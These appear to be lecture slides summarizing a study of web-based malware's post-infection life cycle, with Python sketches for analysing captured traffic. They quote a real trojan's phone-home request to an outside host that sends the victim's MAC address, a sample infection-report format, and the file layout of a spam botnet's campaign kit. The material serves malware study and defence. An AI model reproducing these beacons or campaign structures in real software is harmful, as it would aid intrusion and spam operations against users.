CS 510 Malware • Ghost Turns Zombie: Exploring the Life Cycle of Web-based Malware • Michalis Polychronakis, Panayiotis Mavrommatis, Niels Provos
Introduction • The underground Internet economy • Web-based malware • A system that analyzes the post-infection network behavior of web-based malware • How do the malware’s behaviors, taken together, provide a compelling perspective on the life cycle of web-based malware?
System Architecture • The goal of the system • Detect harmful URLs on the web • A brief overview of the overall system used in the authors’ prior work • Machine learning techniques find suspicious URLs among a large number of web pages; these URLs are then verified in a virtual machine • The new, extended system • Responders
System Architecture Overall system architecture • Virtual machine used • Observed features: • Links to known malware distribution sites • Suspicious HTML elements • The presence of code obfuscation • Machine learning system • Scores each URL; URLs with a high score are passed on for verification • Verification results are used to retrain the machine learning system
System Architecture • Responders • They extended the system by adding light-weight responders to the verification component • The responders provide fabricated responses for protocols such as SMTP, FTP and IRC • An HTTP proxy records all HTTP requests and scans all HTTP responses • A generic responder hands off connections made over nonstandard ports and identifies connections that use unknown protocols
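The slides do not say how a connection is matched to a responder. The following is only a minimal sketch of one way it could work, assuming a lookup by well-known port with a fallback that inspects the first bytes the client sends. The names `STANDARD_PORTS`, `identify_protocol` and `choose_responder`, and the verb heuristics, are hypothetical and not taken from the authors' system.

```python
# Hypothetical sketch: choose a responder for an outgoing connection.
# The port table uses well-known port numbers; the verb heuristics are assumptions.
STANDARD_PORTS = {21: "ftp", 25: "smtp", 80: "http", 6667: "irc"}
HTTP_VERBS = {"GET", "POST", "HEAD"}


def identify_protocol(first_bytes: bytes) -> str:
    """Guess the protocol from the first line the client sends."""
    line = first_bytes.decode("latin-1").split("\r\n", 1)[0]
    parts = line.split()
    if not parts:
        return "unknown"
    verb = parts[0].upper()
    if verb in HTTP_VERBS:
        return "http"
    if verb in {"HELO", "EHLO"}:
        return "smtp"
    if verb == "NICK":
        return "irc"
    if verb == "USER":
        # FTP's USER takes one argument; IRC's USER takes several.
        return "ftp" if len(parts) == 2 else "irc"
    return "unknown"


def choose_responder(port: int, first_bytes: bytes) -> str:
    """Use the port when it is a standard one, otherwise inspect the payload."""
    if port in STANDARD_PORTS:
        return STANDARD_PORTS[port]
    return identify_protocol(first_bytes)
```

For example, `choose_responder(1207, b"GET /geturl.php HTTP/1.1\r\n")` would be routed to the HTTP handling path even though port 1207 is nonstandard, while an unrecognized binary payload is labeled `"unknown"`.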
Responders • Network flow in the verification component
Life cycle of web-based malware • Malware’s interactions with other hosts and responders are organized into 3 categories: 1. Propagation 2. Data exfiltration 3. Remote control • They analyzed the post-infection activity and the results of these behaviors to reconstruct the life cycle of web-based malware
Life cycle of web-based malware Data Set • Over 2 months, the virtual machine analyzed URLs from 5,756,000 unique host names; results are reported per unique host name • 307,000 host names had at least one harmful URL • 49% of these websites had URLs that resulted in HTTP requests initiated by processes other than the web browser • 5% of the sites had URLs that triggered responder sessions • The total number of responder sessions with transmitted data is more than 448,000 • In many more cases, malware made network connections without transmitting any data
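To put the percentages in absolute terms, here is a short worked calculation. It assumes that both the 49% and the 5% figures are relative to the 307,000 host names with at least one harmful URL; the slide does not state the base for the 5% figure explicitly, so treat the last number as an estimate under that assumption.

```python
# Worked arithmetic from the data set slide (integer math to avoid rounding noise).
total_hosts = 5_756_000      # unique host names analyzed
harmful_hosts = 307_000      # host names with at least one harmful URL

# Share of analyzed host names that served at least one harmful URL.
harmful_share = harmful_hosts / total_hosts

# Assumption: both percentages use the 307,000 harmful host names as the base.
non_browser_http_hosts = 49 * harmful_hosts // 100
responder_session_hosts = 5 * harmful_hosts // 100

print(f"harmful share: {harmful_share:.1%}")
print(f"hosts with non-browser HTTP requests: {non_browser_http_hosts:,}")
print(f"hosts that triggered responder sessions: {responder_session_hosts:,}")
```

Under these assumptions, roughly 5.3% of the analyzed host names were harmful, about 150,430 of them caused non-browser HTTP requests, and about 15,350 triggered responder sessions.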
Life cycle of web-based malware Network characteristics • The destination ports of all outgoing connections from the virtual machine upon infection
Life cycle of web-based malware Network characteristics • They report the number of unique hostnames for each port; on each of these hosts, at least one URL installed malware that transmitted data to that port • More than 400 different destination ports were contacted, which shows the diverse nature of malware’s post-infection network behavior
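The per-port count described here can be sketched as a small aggregation. The record layout `(hostname, dest_port, bytes_sent)` and the function name `hosts_per_port` are assumptions made for illustration; the slides do not describe the authors' data format.

```python
from collections import defaultdict


def hosts_per_port(sessions):
    """Count unique hostnames per destination port.

    `sessions` is an iterable of (hostname, dest_port, bytes_sent) tuples,
    a hypothetical record layout. Sessions that sent no data are skipped,
    matching the "transmitted data to that port" criterion.
    """
    hosts = defaultdict(set)
    for hostname, port, bytes_sent in sessions:
        if bytes_sent > 0:
            hosts[port].add(hostname)
    return {port: len(names) for port, names in hosts.items()}


# Made-up sample records, for illustration only.
sample = [
    ("a.example", 25, 120),
    ("a.example", 25, 300),   # same host and port, counted once
    ("b.example", 25, 80),
    ("b.example", 6667, 0),   # connection without data, ignored
    ("c.example", 1207, 512),
]
counts = hosts_per_port(sample)
```

Using a set per port means a host that opens many sessions to the same port is still counted once, which is what a "unique hostnames per port" figure requires.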
The exact distribution of HTTP connections destined to nonstandard ports according to the destination port number
Life cycle of web-based malware Discovery and Propagation • To propagate, malware usually scans for other vulnerable systems, either on the same LAN or on the Internet • This figure shows the distribution of network protocols used by malware
Life cycle of web-based malware Reporting Home • To observe this activity, SMTP responders are employed to capture emails • Each captured email has a subject and a body
Life cycle of web-based malware Reporting Home • Table 1 shows the most common email subjects • Table 2 shows the most common SMTP servers used by malware to send installation reports
Life cycle of web-based malware Reporting Home • The HTTP protocol is also used to report successful installations back to malware authors • Example request sent by a trojan:
GET /geturl.php?version=1.1.2&fid=7493&mac=00-00-00-00-00-00&lversion=&wversion=&day=0&name=dodolook&recent=0 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; )
Host: loader.51edm.net:1207
Cache-Control: no-cache
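As an illustration of what such a report carries, the request line from the trojan example can be split into its fields with Python's standard library. This is a sketch for reading the example, not the authors' tooling; `parse_report` is a hypothetical helper name.

```python
from urllib.parse import parse_qs, urlsplit

# Request line copied from the trojan example on this slide.
REQUEST_LINE = (
    "GET /geturl.php?version=1.1.2&fid=7493&mac=00-00-00-00-00-00"
    "&lversion=&wversion=&day=0&name=dodolook&recent=0 HTTP/1.1"
)


def parse_report(request_line):
    """Return (method, path, fields) for an HTTP request line."""
    method, target, _http_version = request_line.split(" ", 2)
    parts = urlsplit(target)
    # keep_blank_values=True preserves empty fields such as lversion= and wversion=.
    params = parse_qs(parts.query, keep_blank_values=True)
    fields = {name: values[0] for name, values in params.items()}
    return method, parts.path, fields


method, path, fields = parse_report(REQUEST_LINE)
```

The parsed fields show that the request reports a version string, an identifier (`fid`), the victim's MAC address and a name, all in a plain GET query string.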
Life cycle of web-based malware Reporting Home • Malware also reported infections using a custom XML-like format:
HGZ5.<FT>2008-01-28 12:55:30</FT><IM>80</IM><GR>_&</GR>
<SYS>Windows XP 5.1</SYS>
<NE>XP</NE><pid>488</PID><VER>Ver1.22-0624</VER>
<BZ></BZ><P>1</P><V>0</V><IP>0.0.0.0</IP>
000......<LC></LC><GR>-</GR><IM>25</IM><NA>XP</NA>
<CS>English (United States)</CS><OS>Windows XP</OS>
<MEM>1024MB</MEM><CPU>2200 MHz</CPU>
<NET>LAN</NET><video>0</video><BZ>-</BZ>
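Because this format is only XML-like (there is no root element, and the slide shows a tag opened as `<pid>` but closed as `</PID>`), a strict XML parser is unlikely to accept it. The sketch below uses a tolerant regular expression instead; it is an illustrative assumption about how one might read such a report, and `parse_fields` is a hypothetical name.

```python
import re

# Match <TAG>value</TAG> pairs; IGNORECASE lets <pid>...</PID> match as well.
FIELD = re.compile(r"<(\w+)>(.*?)</\1>", re.IGNORECASE | re.DOTALL)


def parse_fields(report):
    """Return (TAG, value) pairs in order of appearance.

    A list is used instead of a dict because tags such as GR, IM and BZ
    occur more than once in the example report.
    """
    return [(tag.upper(), value) for tag, value in FIELD.findall(report)]


# Fragment copied from the example on this slide.
sample = "<SYS>Windows XP 5.1</SYS><NE>XP</NE><pid>488</PID><VER>Ver1.22-0624</VER>"
pairs = parse_fields(sample)
```

Text outside any tag pair, such as the leading `HGZ5.` marker, is simply skipped by this approach.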
Life cycle of web-based malware Data exfiltration • Responder sessions show signs of data exfiltration, such as browser history files and stored passwords • They observed emails that sent stored passwords back from a compromised machine • HTTP is also used for sending sensitive information back to data collection servers (notice the large number of POST requests on the graph on slide #11)
Life cycle of web-based malware Data exfiltration • Within 2 days, one server had 4,729 files containing more than 250,000 valid email addresses • They found more sensitive information in extensive logs continuously uploaded by malware • The logs contain the victim’s IP address, DNS server, gateway, MAC address and username, as well as the URL and the intercepted form and password fields of HTTP requests • In 250 MB of logs, 500 usernames and passwords were found for over 250 web sites, including banking sites, google.com and yahoo.com
Life cycle of web-based malware Joining Botnets • Botnets • They encountered 2 types of botnets in their work: 1. IRC botnets 2. HTTP botnets
Life cycle of web-based malware IRC Botnets • IRC and command-and-control (C&C) communication • IRC sessions to 90 servers were observed, using 1,587 different nicknames in 95 channels
Life cycle of web-based malware IRC Botnets • Some malware uses regular nicknames and channels, while other malware uses artificial nicknames such as [0]USA|XP[P]152102 or Inject-2l087876
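One way to separate artificial nicknames from regular ones is pattern matching. The two patterns below are assumptions derived only from the two examples on this slide; they are not the authors' classification rules, and real data would need broader patterns. The name `looks_generated` is hypothetical.

```python
import re

# Pattern modeled on "[0]USA|XP[P]152102": bracketed number, country code,
# pipe, OS tag, bracketed letter, numeric ID. Purely illustrative.
STRUCTURED = re.compile(r"^\[\d+\][A-Z]{2,3}\|\w+\[\w\]\d+$")

# Pattern modeled on "Inject-2l087876": a separator followed by an ID
# that ends in at least five digits. Purely illustrative.
TRAILING_ID = re.compile(r"[-_]\w*\d{5,}$")


def looks_generated(nickname):
    """Return True if the nickname matches one of the illustrative patterns."""
    return bool(STRUCTURED.match(nickname) or TRAILING_ID.search(nickname))
```

With these patterns, both example nicknames from the slide are flagged, while short human-style nicknames such as `alice` or `bob_2008` are not.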
Life cycle of web-based malware HTTP Botnets • HTTP botnets were used to organize large-scale spam campaigns • To participate, each bot repeatedly issued HTTP requests • Each response contained a ZIP archive with instructions on how to take part in the spam campaign
Life cycle of web-based malware HTTP Botnets • Some example instructions: • 000_data22 - a list of domains and their authoritative name servers, used to form the sender's email address • 001_ncommall - a list of common first names used as part of the sender's email address • 002_otkogo_r - a list of possible "from" names related to the subject of the spam campaign • 003_subj_rep - a list of possible email subjects • 004_outlook - the template of the spam email • config - a configuration file that instructs the bot how to construct emails from the data files, how many emails to send in total, and how many connections are allowed at a given time • message - the message body of the spam campaign • mlist - a list of email addresses to which to send the spam • mxdata - a binary file containing information about the mail-exchange servers for the email addresses in mlist
Life cycle of web-based malware HTTP Botnets • The most frequent domains captured in an hour didn’t entirely overlap with the larger data set